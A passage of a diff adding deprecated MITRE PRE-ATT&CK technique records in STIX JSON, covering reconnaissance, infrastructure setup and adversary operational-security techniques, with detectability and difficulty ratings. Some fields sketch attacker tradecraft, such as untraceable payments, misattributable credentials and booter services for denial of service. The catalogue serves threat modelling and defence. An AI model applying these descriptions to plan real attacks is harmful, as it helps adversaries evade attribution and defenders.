(Citation: CitizenLabGreatCannon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1375", + "url": "https://attack.mitre.org/techniques/T1375" + }, + { + "description": "Bill Marczak, Jakub Dalek, John Scott-Railton, Ron Deibert, Sarah McKune. (2015, April 10). China\u2019s Great Cannon. Retrieved March 9, 2017.", + "source_name": "CitizenLabGreatCannon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:21:59.520Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1152", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Conducting technique requires either nation-state level capabilities or large amounts of financing to coordinate multiple 3rd party resources to gain desired insight.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "While possible to detect, it requires a broader vantage point than is typical that provides increased insight and conducts extensive data analysis and correlation between events.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--cdfdb0cd-a839-403c-9dd6-8a85d8c5c73d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Map network topology", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1252).\n\nA network topology is the arrangement of the various elements of a network (e.g., servers, workstations, printers, routers, firewalls, etc.). Mapping a network allows an adversary to understand how the elements are connected or related. (Citation: man traceroute) (Citation: Shodan Tutorial)", + "external_references": [ + { + "external_id": "T1252", + "url": "https://attack.mitre.org/techniques/T1252", + "source_name": "mitre-pre-attack" + }, + { + "description": "Linux Man Page. (n.d.). traceroute(8) - Linux man page. Retrieved April 2, 2017.", + "source_name": "man traceroute" + }, + { + "description": "A Shodan Tutorial and Primer Daniel Miessler. (n.d.). A Shodan Tutorial and Primer. Retrieved April 2, 2017.", + "source_name": "Shodan Tutorial" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "phase_name": "technical-information-gathering", + "kill_chain_name": "mitre-pre-attack" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1029", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Various available tools and data sources for scouting and detecting network topologies.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Network mapping techniques/tools typically generate benign traffic that does not require further investigation by a defender since there is no actionable defense to execute. 
Defender review of access logs may provide some insight based on trends or patterns.", + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--695b1cce-57d7-49ae-a2af-820d50153f12", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Mine social media", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1273).\n\nAn adversary may research available open source information about a target commonly found on social media sites such as [Facebook](https://www.facebook.com), [Instagram](https://www.instagram.com), or [Pinterest](https://www.pinterest.com). Social media is public by design and provides insight into the interests and potentially inherent weaknesses of a target for exploitation by the adversary. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1273", + "external_id": "T1273" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very public by design. 
Application of privacy settings is not a panacea.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1050", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a54a7708-8f64-45f3-ad51-1abf976986a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Mine technical blogs/forums", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1257).\n\nTechnical blogs and forums provide a way for technical staff to ask for assistance or troubleshoot problems. In doing so they may reveal information such as operating system (OS), network devices, or applications in use. (Citation: FunAndSun2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1257", + "external_id": "T1257" + }, + { + "source_name": "FunAndSun2012", + "description": "Jeff Bardin. (2012, October 10). OSINT and Cyber Intelligence - Fun and Sun in Miami. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Cannot detect access to public sites.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Success is dependent upon the existence of detailed technical specifications for target network posted in blogs/forums. 
Poor OPSEC practices result in an adversary gleaning a lot of sensitive information about configurations and/or issues encountered.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1034", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--31fa5b03-1ede-4fab-8a68-ed831fcf4899", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Misattributable credentials", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1322).\n\nThe use of credentials by an adversary with the intent to hide their true identity and/or portray them self as another person or entity. An adversary may use misattributable credentials in an attack to convince a victim that credentials are legitimate and trustworthy when this is not actually the case. (Citation: FakeSSLCerts)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1322", + "external_id": "T1322" + }, + { + "source_name": "FakeSSLCerts", + "description": "Paul Mutton. (2014, February 12). Fake SSL certificates deployed across the internet. Retrieved March 1, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "If a previous incident identified the credentials used by an adversary, defenders can potentially use these credentials to track the adversary through reuse of the same credentials.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can easily create and use misattributable credentials to obtain servers, build environment, [https://aws.amazon.com AWS] accounts, etc. Many service providers require some form of identifiable information such as a phone number or email address, but there are several avenues to acquire these consistent with the misattributable identity.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1099", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--90884cdb-31dd-431c-87db-9cc7e03191e5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network-based hiding techniques", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1315).\n\nTechnical network hiding techniques are methods of modifying traffic to evade network signature detection or to utilize misattribution techniques. Examples include channel/IP/VLAN hopping, mimicking legitimate operations, or seeding with misinformation. 
(Citation: HAMMERTOSS2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1315", + "external_id": "T1315" + }, + { + "source_name": "HAMMERTOSS2015", + "description": "FireEye. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless defender is dissecting protocols or performing network signature analysis on any protocol deviations/patterns, this technique is largely undetected.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Some of the hiding techniques require special accesses (network, proximity, physical, etc.) and/or may rely on knowledge of how the defender operates and/or awareness on what visibility the defender has and how it is obtained", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1092", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b79e8a3f-a109-47c2-a0e3-564955590a3d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Non-traditional or less attributable payment options", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1316).\n\nUsing alternative payment options allows an adversary to hide their activities. 
Options include crypto currencies, barter systems, pre-paid cards or shell accounts. (Citation: Goodin300InBitcoins)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1316", + "external_id": "T1316" + }, + { + "source_name": "Goodin300InBitcoins", + "description": "Dan Goodin. (2013, October 17). You\u2019re infected\u2014if you want to see your data again, pay us $300 in Bitcoins. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender likely will not have access to payment information. Monitoring crypto-currency or barter boards is resource intensive and not fully automatable.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Easy to use pre-paid cards or shell accounts to pay for services online. Crypto currencies and barter systems can avoid use of trace-able bank or credit apparatus.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1093", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--5436571f-2332-4b51-b7ed-0bc822fe02c2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "OS-vendor provided communication channels", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1390).\n\nGoogle and Apple provide Google Cloud Messaging and Apple Push Notification Service, respectively, services designed to enable efficient communication between third-party mobile app backend servers and the mobile apps running on individual devices. These services maintain an encrypted connection between every mobile device and Google or Apple that cannot easily be inspected and must be allowed to traverse networks as part of normal device operation. These services could be used by adversaries for communication to compromised mobile devices. (Citation: Securelist Mobile Malware 2013) (Citation: DroydSeuss)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1390", + "external_id": "T1390" + }, + { + "source_name": "Securelist Mobile Malware 2013", + "description": "Roman Unuchek, Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved April 12, 2017." + }, + { + "source_name": "DroydSeuss", + "description": "Alberto Coletta, Victor van der Veen, and Federico Maggi. (2016). DroydSeuss: A Mobile Banking Trojan Tracker - Short Paper. Retrieved April 12, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "These services are heavily utilized by mainstream mobile app developers. 
High volume of communications makes it extremely hard for a defender to distinguish between legitimate and adversary communications.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "These are free services provided by Google and Apple to app developers, and information on how to use them is readily available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1167", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1309).\n\nObfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: LUCKYCAT2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1309", + "external_id": "T1309" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Difficult, but defender is well aware of technique and attempts to find discrepancies.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has a variety of solutions, ranging in difficulty, that can be employed (e.g., BGP hijacking, tunneling, reflection, multi-hop, etc.)\nAdversary can also use misattributable credentials to obtain servers, build environment, [https://aws.amazon.com Amazon Web Services] (AWS) accounts, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1086", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1331).\n\nObfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: FireEyeAPT17)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1331", + "external_id": "T1331" + }, + { + "source_name": "FireEyeAPT17", + "description": "FireEye. (2015, May). APT17: Hiding in Plain Sight - FireEye and Microsoft Expose Obfuscation Tactic. Retrieved March 6, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will generally not have visibility into their infrastructure.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Building and testing infrastructure and obfuscating it to protect it against intrusions are a standard part of the adversary process in preparing to conduct an operation against a target.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1108", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--9d234df0-2344-4db4-bc0f-8de9c6c071a7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate operational infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1318).\n\nObfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: DellComfooMasters)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1318", + "external_id": "T1318" + }, + { + "source_name": "DellComfooMasters", + "description": "Joe Stewart and Don Jackson, Dell SecureWorks Counter Threat Unit(TM) Threat Intelligence. (2013, July 31). Secrets of the Comfoo Masters. Retrieved March 6, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "While possible to detect given a significant sample size, depending on how the unique identifier is used detection may be difficult as similar patterns may be employed elsewhere (e.g., content hosting providers, account reset URLs).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can easily generate pseudo-random identifiers to associate with a specific target, include the indicator as part of a URL and then identify which target was successful.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1095", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--357e137c-7589-4af1-895c-3fbad35ea4d2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate or encrypt code", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1319).\n\nObfuscation is the act of creating code that is more difficult to understand. Encoding transforms the code using a publicly available format. Encryption transforms the code such that it requires a key to reverse the encryption. 
(Citation: CylanceOpCleaver)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1319", + "external_id": "T1319" + }, + { + "source_name": "CylanceOpCleaver", + "description": "CYLANCE. (n.d.). Operation Cleaver. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Detecting encryption is easy, decrypting/deobfuscating is hard.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Various solutions exist for the adversary to use. This technique is commonly used to prevent attribution and evade detection.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1096", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--c2ffd229-11bb-4fd8-9208-edbe97b14c93", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscation or cryptography", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1313).\n\nObfuscation is the act of creating communications that are more difficult to understand. Encryption transforms the communications such that it requires a key to reverse the encryption. 
(Citation: FireEyeAPT28)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1313", + "external_id": "T1313" + }, + { + "source_name": "FireEyeAPT28", + "description": "FireEye, Inc. (2014). APT 28: A Window into Russia\u2019s Cyber Espionage Operations?. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Techniques and signatures are hard to detect. Advanced communications and exfiltration channels are nearly indistinguishable from background noise.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Known approaches include the use of cryptography for communications, rotating drops sites (such as random list of chat fora), and one-time [https://aws.amazon.com/s3/ Simple Storage Service (S3)] buckets, etc. All require sophisticated knowledge, infrastructure, and funding.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1090", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d58f3996-e293-4f69-a2c8-0e1851cb8297", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain Apple iOS enterprise distribution key pair and certificate", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1392).\n\nThe adversary can obtain an Apple iOS enterprise distribution key pair and certificate and use it to distribute malicious apps directly to Apple iOS devices without the need to publish the apps to the Apple App Store (where the apps could potentially be detected). (Citation: Apple Developer Enterprise Porgram Apps) (Citation: Fruit vs Zombies) (Citation: WIRELURKER) (Citation: Sideloading Change)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1392", + "external_id": "T1392" + }, + { + "source_name": "Apple Developer Enterprise Porgram Apps", + "description": "Apple Inc.. (2016). Distributing Apple Developer Enterprise Program Apps. Retrieved April 12, 2017." + }, + { + "source_name": "Fruit vs Zombies", + "description": "Claud Xiao. (2016). Fruit vs Zombies: Defeat Non-jailbroken iOS Malware. Retrieved April 12, 2017." + }, + { + "source_name": "WIRELURKER", + "description": "Claud Xiao. (2014). WIRELURKER: A New Era in iOS and OS X Malware. Retrieved April 12, 2017." + }, + { + "source_name": "Sideloading Change", + "description": "David Richardson. (2015, September 10). Change to sideloading apps in iOS 9 is a security win. Retrieved April 12, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "Starting in iOS 9, Apple has changed the user interface when installing apps to better indicate to users the potential implications of installing apps signed by an enterprise distribution key rather than from Apple's App Store and to make it more difficult for users to inadvertently install these apps. Additionally, enterprise management controls are available that can be imposed to prevent installing these apps. 
Also, enterprise mobility management / mobile device management (EMM/MDM) systems can be used to scan for the presence of undesired apps on enterprise mobile devices.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Apple requires a DUNS number, corporate documentation, and $299 to obtain an enterprise distribution certificate. Additionally, Apple revokes certificates if they discover malicious use. However, the enrollment information could be falsified to Apple by an adversary, or an adversary could steal an existing enterprise distribution certificate (and the corresponding private key) from a business that already possesses one.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1169", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--3d1488a6-59e6-455a-8b80-78b53edc33fe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain booter/stressor subscription", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1396).\n\nConfigure and setup booter/stressor services, often intended for server stress testing, to enable denial of service attacks. (Citation: Krebs-Anna) (Citation: Krebs-Booter) (Citation: Krebs-Bazaar)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1396", + "external_id": "T1396" + }, + { + "source_name": "Krebs-Anna", + "description": "Brian Krebs. (2017, January 18). 
Who is Anna-Senpai, the Mirai Worm Author?. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/" + }, + { + "source_name": "Krebs-Booter", + "description": "Brian Krebs. (2016, October 27). Are the Days of \u201cBooter\u201d Services Numbered?. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/" + }, + { + "source_name": "Krebs-Bazaar", + "description": "Brian Krebs. (2016, October 31). Hackforums Shutters Booter Service Bazaar. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1173", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Easily accessible and used to launch DDoS attacks by even novice Internet users, and can be purchased from providers for a nominal fee, some of which even accept credit cards and PayPal payments to do.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Purchase of booster services is not observable; potentially can trace booster service used to origin of sale, yet not before attack is executed. 
Furthermore, subscription does not automatically mean foul intention.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--46017368-6e09-412b-a29c-385be201cc03", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain domain/IP registration information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1251).\n\nFor a computing resource to be accessible to the public, domain names and IP addresses must be registered with an authorized organization. (Citation: Google Domains WHOIS) (Citation: FunAndSun2012) (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1251", + "external_id": "T1251" + }, + { + "source_name": "Google Domains WHOIS", + "description": "Google Domains. (n.d.). About WHOIS. Retrieved April 2, 2017." + }, + { + "source_name": "FunAndSun2012", + "description": "Jeff Bardin. (2012, October 10). OSINT and Cyber Intelligence - Fun and Sun in Miami. Retrieved March 1, 2017." + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Open access to DNS registration/routing information is inherent in Internet architecture.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Proliferation of DNS information makes registration information functionally freely available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1028", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--68b45999-bb0c-4829-bbd0-75d6dac57c94", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain templates/branding materials", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the 